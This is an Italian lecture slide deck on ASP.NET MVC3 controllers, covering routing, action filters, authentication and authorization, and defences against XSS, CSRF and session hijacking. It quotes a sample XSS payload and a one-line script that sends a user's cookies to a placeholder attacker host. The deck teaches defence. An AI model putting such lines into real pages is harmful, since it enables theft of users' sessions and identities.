ASP.NET MVC3 - Tutti i compiti del Controller
1 like699 views
Il documento tratta lo sviluppo di applicazioni web utilizzando ASP.NET e il pattern Model-View-Controller (MVC), evidenziando l'importanza del routing e della separazione delle preoccupazioni. Viene discusso il riconoscimento e l'autorizzazione degli utenti, così come le pratiche di sicurezza per proteggere le applicazioni da vulnerabilità comuni come Cross-Site Scripting e Cross-Site Request Forgery. Infine, vengono presentate tecniche di difesa contro attacchi informatici, inclusa la validazione degli input e l'uso di token antiforgery.
![Come può accadere?
Se permetto agli utenti del mio
sito di inserire contenuti in html,
devo disabilitare il controllo degli
input con [ValidateInput=false]](https://image.slidesharecdn.com/webapp-lez-07-120319172155-phpapp01/85/ASP-NET-MVC3-Tutti-i-compiti-del-Controller-43-320.jpg)
![Come può accadere?
Se permetto agli utenti del mio
sito di inserire contenuti in html,
devo disabilitare il controllo degli
input con [ValidateInput=false]
E se poi qualcuno scrive del
codice javascript?
<script>alert(„XSS‟)</script>](https://image.slidesharecdn.com/webapp-lez-07-120319172155-phpapp01/85/ASP-NET-MVC3-Tutti-i-compiti-del-Controller-44-320.jpg)
![Antiforgery Helper
1 @using(Html.BeginForm()) {
@Html.AntiForgeryToken()
<!-- controlli di input -->
}
2 [HttpPost]
[ValidateAntiForgeryToken]
public ActionResult Change(string pwd)
{](https://image.slidesharecdn.com/webapp-lez-07-120319172155-phpapp01/85/ASP-NET-MVC3-Tutti-i-compiti-del-Controller-52-320.jpg)
ASP.NET MVC3 - Tutti i compiti del Controller
- 1. Sviluppo applicazioni web e linguaggio HTML LEZIONE 07 ASP.NET Model View Controller
- 2. Processa le richieste degli utenti compilando il modello e scegliendo la view da renderizzare Model
- 3. Come fanno le richieste ad arrivare al Controller?
- 4. Attraverso la definizione di regole di Routing
- 5. Una regola di routing traduce l’indirizzo di una richiesta in una serie di parametri
- 6. Una regola di routing traduce l’indirizzo di una richiesta in una serie di parametri
- 7. Tra questi parametri devono sempre esserci controller e action
- 8. … e poi?
- 9. … e poi tocca a noi 1 routes.MapRoute ( "PostByDate", "date/{year}/{month}", new { controller = "Post", action = "ByDate", year = DateTime.Now.Year, month = DateTime.Now.Month } );
- 10. … e poi tocca a noi 2 public ActionResult ByDate(int year, int month) { IList<Post> posts = new List<Post>(); using (var db = new BlogContext()) { posts = (from p in db.Posts where p.PublishedDate.Year == year && p.PublishedDate.Month == month select p).ToList(); } return View("List", posts); }
- 11. This slide is intentionally blank
- 12. Una delle caratteristiche del pattern MVC è la Separation of Concerns
- 13. … ma ci sono degli aspetti dell’applicazione che sono “trasversali”
- 14. Il risultato è spesso una duplicazione di codice
- 15. In questi casi possiamo utilizzare gli ActionFilter
- 16. Attributi che decorano le action del controller che vogliamo intercettare
- 18. Scriviamo un filtro per salvare le statistiche sul numero di pagine visitate
- 20. Se il filtro deve essere applicato a tutte le action posso aggiungerlo alla lista dei GlobalFilters nel file global.asax
- 21. This slide is intentionally blank
- 23. La sicurezza di una applicazione viene garantita tra le altre cose da …
- 24. 1 Riconoscimento dell’utente collegato
- 25. 1 Riconoscimento dell’utente collegato 2 Verifica dell’autorizzazione a procedere
- 26. 1 Riconoscimento dell’utente collegato 2 Verifica dell’autorizzazione a procedere 3 Protezione dalle minacce facilitate dalle vulnerabilità
- 27. 1 Riconoscimento dell’utente collegato
- 28. Per identificare un utente utilizziamo l’autenticazione tramite form
- 29. Per specificare che una action richiede il riconoscimento dell’utente usiamo il filtro AuthorizeAttribute
- 30. Il filtro controlla nell’HttpContext se l’utente è autenticato, se non è così visualizza la pagina di login specificata nel web.config
- 31. A questo punto l’utente ci fornisce le sue credenziali … Utilizza il membership provider integrato(ovvero gli utenti sono salvati nel database ASPNETDB.mdf)
- 32. Normalmente però le credenziali dobbiamo verificarle noi, dall’elenco degli utenti della nostra applicazione
- 33. Verifica dell’autorizzazione a Dependency procedere Injection
- 34. Anche se l’utente è conosciuto non è detto che abbia i permessi per svolgere una determinata operazione
- 35. L’accesso può essere regolato per utente e/o per ruolo, generalmente però i permessi sono specifici dell’applicazione
- 36. Ad esempio un autore non può modificare i post di un altro autore
- 37. 3 Protezione dalle minacce facilitate dalle vulnerabilità
- 40. Cross Site Scripting Permette ad un hacker di inserire codice al fine di modificare il contenuto della pagina web visitata.
- 41. Cross Site Scripting Permette ad un hacker di inserire codice al fine di modificare il contenuto della pagina web visitata. In questo modo è possibile sottrarre dati sensibili presenti nel browser degli utenti che visiteranno successivamente quella pagina. Fonte: Wikipedia
- 42. Come può accadere? Se permetto agli utenti del mio sito di inserire contenuti in html …
- 43. Come può accadere? Se permetto agli utenti del mio sito di inserire contenuti in html, devo disabilitare il controllo degli input con [ValidateInput=false]
- 44. Come può accadere? Se permetto agli utenti del mio sito di inserire contenuti in html, devo disabilitare il controllo degli input con [ValidateInput=false] E se poi qualcuno scrive del codice javascript? <script>alert(„XSS‟)</script>
- 45. Come difendersi?
- 46. Come difendersi? Encoding quando serve e validazione degli input lato server, ovvero pulizia dai tag indesiderati
- 48. Cross Site Request Forgery Permette ad un hacker di sfruttare l‟autenticazione tramite cookie per effettuare una richiesta cross-domain a nome dell‟utente (ovviamente ignaro di tutto).
- 49. Come può accadere? Accade se visito la pagina nella quale un hacker ha inserito un link con i parametri “giusti” (oppure un codice che esegue un post automatico) dopo essermi autenticato sul sito vulnerabile a tale attacco.
- 50. Come difendersi?
- 51. Indirizzo dal quale Come difendersi? è stata inviata la richiesta Controllare il referrer della richiesta oppure utilizzare un token fornito dall’Antiforgery Helper
- 52. Antiforgery Helper 1 @using(Html.BeginForm()) { @Html.AntiForgeryToken() <!-- controlli di input --> } 2 [HttpPost] [ValidateAntiForgeryToken] public ActionResult Change(string pwd) {
- 54. Session Hijacking Permette ad un hacker di sfruttare la vulnerabilità XSS per “rubare” l‟identità di un utente data dal suo cookie di autenticazione.
- 55. Come può accadere? L‟hacker nasconde dietro l‟indirizzo di una immagine una chiamata al suo sito passndo come parametro il valore del cookie dell‟utente. img.src = “http://sito.hacker/ruba_identita?cookies=“+ encodeURI(document.cookie);
- 56. Come difendersi?
- 57. Come difendersi? Impedire l‟accesso al cookie tramite script settando a true la proprietà HttpOnly (disponibile da IE 6 SP1).
- 58. continua?
- 59. Credits Le immagini contenute in questa presentazione hanno licenza Creative Commons Slide 4: http://www.flickr.com/photos/telstar/2987850087/in/photostream/ Slide 22: http://www.flickr.com/photos/mbiskoping/4120185389/in/photostream/ Slide 27: http://www.flickr.com/photos/clappstar/131011191/in/photostream/ Slide 33: http://www.flickr.com/photos/24196101@N00/6243028090/ Slide 39-43-47: http://www.flickr.com/photos/35703177@N00/3720913706/ Slide 39: http://www.flickr.com/photos/nizger/5750806378/in/photostream/
- 60. Thank You MANUEL SCAPOLAN website: www.manuelscapolan.it twitter: manuelscapolan e-mail: info@manuelscapolan.it